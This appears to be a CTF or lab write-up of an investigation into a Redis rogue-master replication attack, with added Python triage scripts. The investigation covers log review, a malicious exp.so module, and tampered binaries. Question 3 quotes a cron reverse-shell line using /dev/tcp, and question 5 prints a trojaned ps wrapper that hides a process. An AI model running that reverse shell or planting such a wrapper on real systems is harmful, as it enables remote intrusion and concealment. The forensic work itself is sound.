Chapter 2 Log Analysis - Redis Incident Response


Overview:

Server scenario OS: Linux
Server account / password: root xjredis

Task environment notes
Note: do NOT run the sample locally!!! Do NOT run the sample locally!!! Do NOT run the sample locally!!!
Incident-response engineer Xiao Wang received an alert from a security appliance that a server had been implanted with a malicious file; please log on to the host and investigate.

1.

SSH to the server from the local PC, work out the IP from which the attacker successfully compromised it, and submit the attacker IP as the FLAG.

First look in redis.conf to find where the log file is; it is at /var/log/redis.log.


Look at the log section below. At first the instance keeps trying to switch its master to 192.168.100.13:8888 and fails (connection refused); the replica is then forcibly pointed at other masters (192.168.31.55 and 192.168.100.20), and finally, after syncing from the malicious master, Redis loads a module named exp.so. So the attacker carried out a Redis master-slave replication RCE (rogue master) attack. Note that the SLAVEOF commands themselves were issued from the client 192.168.200.2, but the host whose sync actually delivered exp.so is 192.168.100.20, so the attacker IP is 192.168.100.20: flag{192.168.100.20}

```
[Redis startup banner]  Redis 5.0.1 (00000000/0) 64 bit
                        Running in standalone mode
                        Port: 6379
                        PID: 419
                        http://redis.io

419:M 31 Jul 2023 05:25:31.525 # WARNING: The TCP backlog setting of 511 cannot be enforced because /proc/sys/net/core/somaxconn is set to the lower value of 128.
419:M 31 Jul 2023 05:25:31.525 # Server initialized
419:M 31 Jul 2023 05:25:31.525 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
419:M 31 Jul 2023 05:25:31.525 # WARNING you have Transparent Huge Pages (THP) support enabled in your kernel. This will create latency and memory usage issues with Redis. To fix this issue run the command 'echo never > /sys/kernel/mm/transparent_hugepage/enabled' as root, and add it to your /etc/rc.local in order to retain the setting after a reboot. Redis must be restarted after THP is disabled.
419:M 31 Jul 2023 05:25:31.525 * Ready to accept connections
419:S 31 Jul 2023 05:33:15.065 * Before turning into a replica, using my master parameters to synthesize a cached master: I may be able to synchronize with the new master with just a partial transfer.
419:S 31 Jul 2023 05:33:15.065 * REPLICAOF 192.168.100.13:8888 enabled (user request from 'id=3 addr=192.168.200.2:64289 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:33:15.610 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:15.610 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:15.611 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:16.612 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:16.612 * MASTER <-> REPLICA sync started
...
419:S 31 Jul 2023 05:34:03.722 * Connecting to MASTER 192.168.31.55:8888
419:S 31 Jul 2023 05:34:03.722 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.786 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:33.786 * MASTER <-> REPLICA sync started
...
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
419:M 31 Jul 2023 05:34:37.210 # Setting secondary replication ID to 7a73a1a4297a16c50d8465b0cc432444f0e5df71, valid up to offset: 1. New replication ID is 46e68f9593cd148bffe464f0b04bee19ac447c39
419:M 31 Jul 2023 05:34:37.210 * MASTER MODE enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=4 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=34 qbuf-free=32734 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:M 31 Jul 2023 05:34:37.231 * Module system unloaded
419:M 31 Jul 2023 05:42:00.685 * DB saved on disk
419:M 31 Jul 2023 05:42:42.213 * DB saved on disk
419:M 31 Jul 2023 06:06:44.597 # User requested shutdown...
419:M 31 Jul 2023 06:06:44.597 * Saving the final RDB snapshot before exiting.
419:M 31 Jul 2023 06:06:44.599 * DB saved on disk
419:M 31 Jul 2023 06:06:44.599 * Removing the pid file.
419:M 31 Jul 2023 06:06:44.599 # Redis is now ready to exit, bye bye...
441:C 31 Jul 2023 06:10:29.635 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
441:C 31 Jul 2023 06:10:29.640 # Redis version=5.0.1, bits=64, commit=00000000, modified=0, pid=441, just started
441:C 31 Jul 2023 06:10:29.640 # Configuration loaded
441:M 31 Jul 2023 06:10:29.643 * Increased maximum number of open files to 10032 (it was originally set to 1024).
```
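To make this kind of review repeatable on a larger redis.log, here is an added Python example (not part of the original write-up) that extracts REPLICAOF requests and the client that issued them, the sequence of masters tried, and every module load, attributing each load to the master the instance was syncing from at that moment. The sample log is a condensed, constructed copy of the excerpt above.

```python
import re

# Constructed sample: a condensed copy of the redis.log excerpt shown above.
SAMPLE_LOG = """\
419:M 31 Jul 2023 05:25:31.525 * Ready to accept connections
419:S 31 Jul 2023 05:33:15.065 * REPLICAOF 192.168.100.13:8888 enabled (user request from 'id=3 addr=192.168.200.2:64289 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:33:15.610 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:15.611 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:34:03.722 * Connecting to MASTER 192.168.31.55:8888
419:S 31 Jul 2023 05:34:33.786 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
419:M 31 Jul 2023 05:34:37.210 * MASTER MODE enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=4 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=34 qbuf-free=32734 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:M 31 Jul 2023 05:34:37.231 * Module system unloaded
"""

# One regex per event type that matters for rogue-master (SLAVEOF + MODULE LOAD) abuse.
LINE_RE = re.compile(r"^(?P<pid>\d+):(?P<role>[MSC]) (?P<ts>\d{1,2} \w{3} \d{4} [\d:.]+) [#*\-.] (?P<msg>.*)$")
REPLICAOF_RE = re.compile(r"REPLICAOF (?P<master>\S+) enabled \(user request from '.*?addr=(?P<client>[\d.]+):\d+")
MASTER_MODE_RE = re.compile(r"MASTER MODE enabled \(user request from '.*?addr=(?P<client>[\d.]+):\d+")
CONNECT_RE = re.compile(r"Connecting to MASTER (?P<master>\S+)")
MODULE_RE = re.compile(r"Module '(?P<name>[^']+)' loaded from (?P<path>\S+)")

def analyze_redis_log(text):
    """Return replication-abuse indicators: who issued SLAVEOF, which masters
    were tried, and which master the instance was syncing from at module load."""
    findings = {"replicaof_requests": [], "masters_tried": [], "modules": [], "clients": set()}
    current_master = None
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, msg = m["ts"], m["msg"]
        if r := REPLICAOF_RE.search(msg):
            findings["replicaof_requests"].append((ts, r["master"], r["client"]))
            findings["clients"].add(r["client"])
        elif r := MASTER_MODE_RE.search(msg):
            findings["clients"].add(r["client"])
        elif r := CONNECT_RE.search(msg):
            current_master = r["master"]
            if current_master not in findings["masters_tried"]:
                findings["masters_tried"].append(current_master)
        elif r := MODULE_RE.search(msg):
            # A module appearing while the instance is a replica was delivered by
            # the master it was syncing from; that is the attacker's host.
            findings["modules"].append({"ts": ts, "name": r["name"], "path": r["path"],
                                        "served_by": current_master, "role": m["role"]})
    return findings
```

Run it with `analyze_redis_log(open("/var/log/redis.log").read())`; any entry in `modules` whose `role` is `S` and whose `path` is outside the configured module directory deserves the same treatment as exp.so here.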

2.

SSH to the server from the local PC, analyze the first malicious file the attacker uploaded, and submit the FLAG contained in that malicious file.

From the analysis in question 1 the malicious file is /exp.so; simply run strings /exp.so | grep "flag" to see the flag inside it: flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}


3.

SSH to the server from the local PC, analyze the IP of the attacker's reverse shell, and submit the reverse-shell IP as the FLAG.

I downloaded /exp.so to my machine and submitted it to both the ThreatBook (微步) cloud sandbox and the Anheng (安恒) cloud sandbox; neither detected any network behaviour, so reverse engineering was the only option. It turns out that when the .so is invoked it takes an ip and a port and uses the Redis cron-job technique to plant a reverse shell.


So crontab -l shows the reverse-shell cron job: */1 * * * * /bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1, hence flag{192.168.100.13}


Reading 巨魔师傅's write-up I came across linpeas.sh, a script that automatically enumerates privilege-escalation candidates on a Linux system; it also picks up this cron job.


4.

SSH to the server from the local PC, trace the attacker's username, and find the key string in the tool the attacker used (flag{attacker-username-key-string}; note the key string has the form xxx-xxx-xxx). Submit the username and key string as the FLAG.

For leftover user information, the first thing that comes to mind is the SSH public key file; checking it does indeed reveal a username: xj-test-user

Searching GitHub for that user finds an account whose repositories include redis-rogue-getshell, a Redis master-slave replication exploitation tool. In that repository's commit history there is a commit named tye that contains the key string, so flag{xj-test-user-wow-you-find-flag}


5.

SSH to the server from the local PC, analyze the command the attacker tampered with, and submit the key string inside the tampered command as the FLAG.

Check the PATH variable and go through every directory it lists.

In /usr/bin, ps is only 178 bytes, which is clearly tampered (the listing also shows it is world-writable and that the real binary was renamed to ps_). Reading the file shows the attacker's replacement hides the threadd process; the marker string is at the end of the file: flag{c195i2923381905517d818e313792d196}

```
root@ip-10-0-10-4:~# ls -l /usr/bin
...
-rwxrwxrwx 1 root root 178 Jul 31 2023 ps
-rwxr-xr-x 1 root root 133432 Jul 31 2023 ps_
lrwxrwxrwx 1 root root 9 Jul 28 2018 psfaddtable -> psfxtable
lrwxrwxrwx 1 root root 9 Jul 28 2018 psfgettable -> psfxtable
lrwxrwxrwx 1 root root 9 Jul 28 2018 psfstriptable -> psfxtable
-rwxr-xr-x 1 root root 22848 Jul 28 2018 psfxtable
-rwxr-xr-x 1 root root 3549 Jul 21 2020 ptar
-rwxr-xr-x 1 root root 2628 Jul 21 2020 ptardiff
...
root@ip-10-0-10-4:~# cat /usr/bin/ps
#/bin/bash
oldifs="$IFS"
IFS='\$n'
result=$(ps_ $1 $2 $3|grep -v 'threadd' )
for v in $result;
do
echo -e "$v\t";
done
IFS="$oldifs"
#//c195i2923381905517d818e313792d196
```
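The two tells in the listing above (a world-writable ps, and a non-ELF wrapper sitting next to a renamed real binary ps_) are easy to check across every PATH directory. The following is an added Python example, not part of the original write-up; build_demo_dir constructs a throwaway directory that mimics the tampered /usr/bin so the check can be run offline.

```python
import os
import stat
import tempfile

ELF_MAGIC = b"\x7fELF"

def is_elf(path):
    try:
        with open(path, "rb") as f:
            return f.read(4) == ELF_MAGIC
    except OSError:
        return False

def triage_dir(directory):
    """Return {name: [reasons]} for executables in one PATH directory that look replaced."""
    findings = {}
    try:
        names = set(os.listdir(directory))
    except OSError:
        return findings
    for name in sorted(names):
        path = os.path.join(directory, name)
        if os.path.islink(path) or not os.path.isfile(path):
            continue
        mode = os.stat(path).st_mode
        if not mode & stat.S_IXUSR:
            continue
        reasons = []
        if mode & stat.S_IWOTH:
            reasons.append("world-writable executable")
        # Attacker pattern from this case: original renamed to name_ and a script put in its place.
        shadow = name + "_"
        if shadow in names and is_elf(os.path.join(directory, shadow)) and not is_elf(path):
            reasons.append(f"non-ELF wrapper where a binary is expected; original apparently renamed to {shadow}")
        if reasons:
            findings[name] = reasons
    return findings

def build_demo_dir():
    """Constructed sample mimicking the tampered /usr/bin above: a 0777 wrapper
    script named ps next to the renamed real binary ps_, plus an untouched ls."""
    d = tempfile.mkdtemp()
    for name, data, mode in (("ps_", ELF_MAGIC + b"\0" * 60, 0o755),
                             ("ls", ELF_MAGIC + b"\0" * 60, 0o755),
                             ("ps", b"#!/bin/bash\nexec ps_ \"$@\"\n", 0o777)):
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
        os.chmod(os.path.join(d, name), mode)
    return d
```

On a live host, run triage_dir over each entry of os.environ["PATH"].split(":"); on Debian-based systems the hits can then be confirmed against package checksums with dpkg --verify.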